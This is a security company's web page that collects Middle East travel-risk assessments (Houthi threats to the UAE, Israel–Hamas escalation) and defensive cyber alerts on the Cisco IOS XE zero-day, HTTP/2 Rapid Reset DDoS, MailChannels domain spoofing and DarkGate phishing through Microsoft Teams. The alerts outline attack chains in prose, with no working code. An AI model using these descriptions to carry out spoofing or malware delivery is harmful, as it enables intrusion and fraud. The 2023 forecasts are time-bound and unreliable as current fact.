                If the Israel-Hamas conflict is not contained and provokes a US retaliation, the Supreme Leader of the Houthi Movement has issued a statement declaring that they will respond with drones and missiles, and with the Al Dhafra Air Base located just to the south of Abu Dhabi, it is highly likely that Houthi forces will attempt to target the US military and US interests within the UAE.

                For those travelling on business to UAE or will be attending COP28, Solace Global Risk facilitate safer travel for corporate travellers, executives and private clients, with travel risk assessments and end-to-end secure journey management.

                Security solutions include intelligence and advisory, latest security alerts through Solace Secure, security trained drivers and airport meet and greet.

                Our Journey Risk Management Solutions

                Speak to our team about your journey management needs

                  CVE-2023-20198

                  Cyber Security Alert: Active Exploitation of 0-Day Vulnerability – Cisco IOS XE

                  please add an image

                  Overview: A critical patch for Cisco IOS XE devices has been issued. Over 40k+ known exploited Cisco devices discovered.

                  Threat Name: CVE-2023-20198

                  Risk Factor: Critical

                  Date: 24th Oct 2023

                  Get Help Now

                  Solace Cyber security specialists can secure your estate with patching and conduct forensic analysis

                  What We Know About The Attack.

                  Cisco has announced that a known zero-day CVE-2023-20198 is currently being exploited. This vulnerability has the highest CVSS score of 10. It is a privilege escalation vulnerability allowing an unauthenticated attacker to create a high privilege account on the affected system.

                  During the known attack Cisco has observed the use of another vulnerability CVE-2023-20273. This CVE allows a remote authenticated attacker to inject arbitrary commands as the root user. Detected implants placed on affected devices plummeted at the weekend. This was likely caused by the threat actors modifying the implant to evade detection.

                  The threat actor’s intentions are unknown. It is currently believed that over 40K devices have implants. (24/10/23)

                  Which Organisations Are Affected By This Attack?

                  Any organisations using Cisco IOS XE devices. The following question to address pertains to the configuration of your server:

                  Is it set up with either HTTP or HTTPS management? If it is configured this way and remains unpatched, there is potential for exploitation.

                  Do you operate any services that rely on HTTP or HTTPS communication, such as eWLC? If the answer is no, it is advisable to deactivate the HTTP Server feature. However, if the answer is yes, consider limiting access to those services to trusted networks, if feasible.

                  Solace Cyber Recommendations

                  To ensure that your systems have not been compromised, it is essential to follow these steps:

                  1. Check for Compromise: Refer to Cisco’s guidance, where they have released a specific curl command to assist in the verification process. This command will help you assess if there are any malicious artifacts present on the Cisco devices that are linked to this activity.
                  2. Disable the HTTP Server Feature or Limit its Access: On all devices that are exposed to the internet, it is highly recommended to disable the HTTP server feature. This will eliminate a potential attack vector and reduce the risk of unauthorised access through this avenue. By doing so, you are taking proactive steps to enhance the security of your network infrastructure. A1lternatively make this only accessible to trusted IP addresses.
                  3. Patch Your Cisco IOS XE Devices: It is of utmost importance to apply the latest security patches to your Cisco IOS XE devices without delay. Timely patching is a critical aspect of maintaining a secure network environment. By keeping your devices up to date with the latest security updates, you are fortifying your infrastructure against known vulnerabilities and reducing the likelihood of exploitation by malicious actors.

                  In summary, following these steps diligently will help you mitigate the risks associated with the disclosed vulnerabilities, maintain the security of your network, and protect your systems and data from potential threats.

                  Need support?

                  Solace Cyber security specialists can secure your estate with patching and conduct forensic analysis.

                    Israel’s Military Strategy and Biden’s Visit

                    Current Assessment of Israel Hamas Conflict

                    Intelligence cut-off time 11:00 GMT 17th of October 2023

                    Whilst it remains almost certain that the Israeli Defence Forces (IDF) will commit to a ground offensive in the Gaza Strip, this is unlikely to occur within the next 24-48 hours.

                    The main factor contributing to the postponement is the recent revelation of President Biden’s visit to Israel for discussions with Israeli Prime Minister Benjamin Netanyahu on Wednesday 18 October. It is highly unlikely that the US will sponsor an IDF invasion while President Biden is within Israel due to the threat associated with Hezbollah retaliation from Lebanon, which will almost certainly be backed by the Iranian regime, or from one of the other militant groups operating out of the West Bank. It is estimated that Hezbollah alone has amassed a stock of over 150,000 rockets. While most of these rockets are crude and unguided munitions that range out only to 10-40km, Hezbollah also maintain a stock of more sophisticated Iranian-derived rocket and missile systems such as the Fateh-110 (250-300km), SCUD-B/C/D (300-550km) and the Zelzal 1/2 ballistic missiles (125-250km). Such weapon systems enable Hezbollah to target high-value targets such as Ben Gurion airport with a high degree of accuracy. While it is expected that Israel’s Iron Dome air defence system will detect and intercept the majority of rockets, there is a realistic possibility that Hezbollah could launch missile and rocket salvos large enough to overwhelm the air defence system.

                    Given the missile and rocket threat posed by Hezbollah and the fact Hamas have now likely fired the majority of their rockets, there is a realistic possibility that the IDF will be forced to reposition mobile elements of its Iron Dome system to counter the emerging threat in the north.

                    Iran’s Involvement with Israel Hamas Conflict

                    Iran has warned that its proxy forces will conduct “pre-emptive action” in response to Israel’s retaliatory strikes on Gaza, which will invariably include the use of Hezbollah forces. However, it is unlikely that Hezbollah will conduct any major attacks with President Biden in Israel for fear of a major US retaliation.

                    Moreover, it is more likely that Hezbollah and Iran will wait until Israel commits forces to Gaza as the IDF will have a considerable amount of its forces fixed in the south, offering a tactically advantageous position to open up a northern front that will almost certainly stretch IDF forces and complicate Israeli re-supply and sustainment. To counter Iran and its proxies’ threats, the US has moved its USS Gerald Ford led Carrier Strike Group (CSG) 12 into the Eastern Mediterranean and has deployed a second CSG led by the USS Eisenhower to the Mediterranean which is currently in the eastern Atlantic and is expected to enter the eastern Mediterranean in the next couple of days. The combined combat power of two US CSGs will provide Israel with overwhelming air superiority should the US enter into a conflict with Israel, with warnings already issued to Iran that the US will engage Iranian proxy forces. It is highly likely that Israel will delay a ground offensive until the USS Eisenhower is positioned in the eastern Mediterranean.

                    Expectations for Biden’s Visit to Israel

                    It is expected that Biden will discuss with Netanyahu the evacuation of civilians from the Gaza Strip through the Rafah crossing with Egypt. It is likely that Biden will demand that a humanitarian corridor is established before IDF forces enter Gaza, with Biden also forecasted to visit Egypt where he will likely use diplomatic pressure to demand the same from Egypt. It is likely that the IDF will want to commit forces sooner rather than later as any delay will afford Hamas and other militants to prepare defensive positions and mobilise forces. However, Israel is hugely dependent on US military aid which currently stands at approximately USD 4 billion per annum. It is unlikely that Israel has weapon stocks high enough to sustain military operations whilst maintaining enough weaponry to counter Hezbollah or deal with a wider conflict. Therefore, it is likely that Israel will have to submit to US requests in order to guarantee the delivery of future military aid and will not commit to a ground offensive until Biden has some reassurances from Tel Aviv.

                    Alternative Analysis

                    Hezbollah, under orders from Iran will launch a pre-emptive attack on Israel prior to the arrival of President Biden. Such a move will provoke Israel into retaliating and committing to a ground offensive in Gaza before the Rafah crossing is opened and civilians are evacuated, causing an acute humanitarian crisis. This will undoubtedly provoke much international condemnation, resulting in anti-Israeli protests and rhetoric and potentially force the West to temper its support of Israel.

                    Solace Global Security Within Israel

                    Whether you are considering an evacuation or seeking to continue operations while ensuring the safety of your team, we are here to assist.

                    For those seeking a secure exit from Israel, Solace Global offers comprehensive journey management services:

                    • Private Charter Flights: Flight options are available to various destinations across Europe.
                    • Secure Ground Transportation: Secure movement within Israel, ensuring access to open land borders and maritime evacuation points.
                    • Armed or unarmed English-speaking security-trained drivers, Close Protection Officers (CPOs), and discreet, low-profile vehicles at your disposal.

                    CVE-2023-44487

                    Cyber Security Alert: Record breaking DDoS attack with the HTTP/2 Rapid reset Vulnerability

                    Coding against a global map

                    Overview: A small botnet has leveraged a HTTP/2 vulnerability to cause a record-breaking DDoS attack.

                    Threat Name: CVE-2023-44487

                    Risk Factor: Medium

                    Date: Oct 2023

                    Get Help Now

                    Solace Cyber security specialists can secure your estate with patching and conduct forensic analysis

                    What We Know About The HTTP/2 DDoS Attack.

                    Cloudflare detected an unprecedented DDoS attack on August 25, 2023, reaching a peak of over 201 million requests per second, three times larger than Cloudflare’s previous record. The attack exploited a weakness in the HTTP/2 protocol and was executed by a modest botnet comprising 20,000 machines.

                    Cloudflare reported that the entire web experiences 1-3 billion requests per second, suggesting that using this method, attackers could concentrate the equivalent of the entire web’s volume of requests on a few specific targets. Similar attacks have also been observed by Google and AWS in recent weeks.

                    This vulnerability allows an attacker to deplete the victim’s server resources by repeatedly sending and canceling requests in rapid succession, ultimately impacting the targeted website or application.

                    CISA have added this vulnerability to its known exploit catalogue. https://www.cisa.gov/news-events/alerts/2023/10/10/cisa-adds-five-known-vulnerabilities-catalog

                    What’s The Impact of the DDos Attack?

                    The identified vulnerability predominantly poses a threat to the availability of systems. In light of this, if your business relies on external web servers for its operations, it is imperative to take proactive measures to safeguard against potential disruptions. This entails diligently implementing the latest updates for your webservers and fortifying your defenses with resilient Distributed Denial of Service (DDoS) mitigation strategies.

                    To address this vulnerability effectively, it is crucial to patch all accessible web services that utilize the HTTP/2 protocol. Regularly updating and patching these services is pivotal to staying ahead of potential exploits, ensuring that your systems are fortified against emerging threats.

                    How Do I Protect My Business?

                    Incorporating a comprehensive approach to cybersecurity is essential. This involves not only staying current with software updates but also implementing robust DDoS mitigation methods. By doing so, you establish a proactive defense mechanism, capable of swiftly identifying and neutralizing any attempts to exploit vulnerabilities.

                    In essence, a multi-faceted security strategy is essential for any organisation reliant on external web servers. Through diligent updates, particularly for HTTP/2-utilizing web services, and the implementation of robust DDoS mitigation measures, you fortify your business against potential disruptions, thereby safeguarding the availability of critical systems integral to your operations.

                    Solace Cyber Recommendations

                    Swiftly update your webservers by applying the available software updates for Apache, Tomcat, IIS, .NET, nghttp2, and h2o.

                    Mitigate the impact of potential DDoS attacks on your organisation by implementing DDoS mitigation services.

                    Solace is ready to support you in ensuring that your security products are up to date with the latest patches and can provide assistance with any inquiries regarding DDoS mitigation methods.

                    Need support?

                    Solace Cyber security specialists can secure your estate with patching and conduct forensic analysis.

                      Cyber Security Alert: Do you use MailChannels? 2M domains open to phishing attacks.

                      Screen reviewing email vulnerability

                      Overview: Security researchers recently uncovered a straightforward method to spoof more than 2 million domains, raising significant concerns in the cyber security community.

                      Risk Factor: Critical

                      Date: Sept 2023

                      Get Help Now

                      Solace Cyber security specialists can perform a detailed mail security review and assist you with your supply chain risk.

                      What We Know About The MailChannels Spoofing Issue

                      The news comes after the recent Defcon hacking conference where Marcello Salvati, a researcher affiliated with Rapid 7, gave an eye-opening talk that demonstrated a method for leveraging the “biggest transactional email service” and Cloudflare, effectively circumventing the safeguards of SPF (Sender Policy Framework) and DMARC (Domain-based Message Authentication, Reporting, and Conformance).

                      While the initial insights shared during the talk have seen some partial mitigation measures implemented, particularly with the use of Cloudflare workers and MailChannels, a disconcerting concern still persists.

                      What is the ongoing risk to MailChannels Users?

                      The issue poses a substantial risk for MailChannels customers, as well as those whose hosting providers rely on their services. Even if your domain has SPF and DMARC measures well-configured, the possibility remains that your domain could be maliciously spoofed by other MailChannels customers.

                      This alarming revelation underscores the persistent challenges in ensuring the security and authenticity of email communications, compelling organisations to remain vigilant and consider additional protective measures to safeguard their digital identities.

                      What’s The Impact on MailChannels Services?

                      Inclusion of the MailChannels SPF record may expose domains and users to impersonation risks. A recent solution has been introduced to address this concern. Given that a significant portion of the 2 million domains lacks these protective measures, it opens the door to widespread misuse of the MailChannels service.

                      The author highlights the absence of sender identity verification, allowing anyone to register on their website for a mere $80 and employ their “normal” SMTP relay to maliciously spoof customer domains.

                      Furthermore, another discovery reveals the adoption of a novel email service known as ARC, which inherently reduces spam scores.

                      Solace Cyber’s threat researchers, utilising SMTP, have validated these findings as genuine threats, emphasising the importance of organisations implementing countermeasures promptly.

                      Solace Cyber Recommendations

                      Ensure that your organisation has adequate email safeguards activated, including SPF, DMARC, and DKIM protocols.

                      Confirm the integrity of your SPF records and check for the presence of MailChannels. If you do, it will look like this: “include:relay.mailchannels.net.” Ensure the necessity of all other entries in your SPF record, and if the MailChannels entry is unnecessary, remove it from your SPF configuration, along with any other superfluous entries.

                      Alternatively, if you require the MailChannels SPF record, add the recommended MailChannels lockdown TXT record. You may need to speak to your webhosting provider.

                      1. Create a DNS TXT record following the pattern _mailchannels.yourdomain.com, replacing yourdomain.com with your domain name.
                      2. In the DNS TXT record, specify one or more MailChannels account ids (auth) or sender ids (senderid) that are permitted to send emails for their domain, using the following syntax: v=mc1 auth=myhostingcompany senderid=mysenderid

                      Furthermore, it is advisable to evaluate your supply chain for potential vulnerabilities in their email configurations.

                      Useful Resources

                      Need help?

                      Solace Cyber security specialists can perform a detailed mail security review and assist you with your supply chain risk.

                        Cyber Security Alert: Microsoft Teams leveraged to push DarkGate Malware

                        hand guiding technology

                        Overview: Researchers have found that the DarkGate malware strain is being spread through phishing campaigns in Microsoft Teams by outside parties

                        Risk Factor: High

                        Date: August 2023

                        Get Help Now

                        Solace Cyber security specialists can perform gap analysis of your current AV / EDR products to ensure all endpoints are protected.

                        What We Know About The Microsoft Teams Phishing Campaign Pushing DarkGate Malware

                        In a recent incident, security experts at Truesec noticed Microsoft Teams messages originating from third-party accounts, delivering ZIP files that purported to be from the victims HR department.

                        Initially, the attack commenced with a social engineering tactic aimed at enticing the recipient to click on the .zip file, which contained an LNK (shortcut) file masquerading as a PDF document.

                        Upon execution, this file triggered a VBScript that initiated the download of a payload utilizing curl.exe and harnessed AutoIT in conjunction with a compiled AutoIT script. The outcome of this process was the detection of the file as DarkGate Malware by VirusTotal.

                        The malware supports a magnitude of malicious activities including remote access tooling, cryptocurrency mining, keylogging and a built-in stealer.

                        Security Awareness in Microsoft Teams

                        Microsoft Teams, by default, permits external third parties to engage in communication through its platform. While many training resources focus on email as a potential threat vector, it’s crucial to educate your user base about the risks associated with external communications in Teams as well.

                        It’s worth noting that even with security measures like Microsoft Safe Links and Safe Attachments in place, they may not provide complete protection against all types of threats. As seen in the incident investigated by TrustSec, there can still be vulnerabilities and risks to address. Therefore, a multi-layered security approach that includes user awareness and training is essential to bolster your organization’s defense against evolving threats in platforms like Microsoft Teams.

                        Emerging Phishing Threats: What’s The Impact?

                        This particular phishing campaign is still in its early days.

                        Given the limited range of mitigation methods currently available and the probability that users have not been adequately trained to recognise this specific threat vector, they may be more susceptible to this tactic compared to traditional email-based attacks.

                        Solace Cyber Recommendations

                        Educating staff about this specific threat vector is crucial. Prioritise raising awareness, similar to efforts against email phishing attacks.

                        Given the restricted options for mitigation, it’s advisable to assess external messaging permissions. Administrators have the option to create an approved list of specific organisations allowed to communicate or, alternatively, block all third-party communications.

                        Additionally, it’s essential to conduct a comprehensive gap analysis of your existing AV (Antivirus) and EDR (Endpoint Detection and Response) solutions to guarantee that all endpoints are equipped with functioning and current protection measures.

                        Gap Analysis Support

                        Solace Cyber can perform gap analysis of your current AV / EDR products to ensure all endpoints are protected.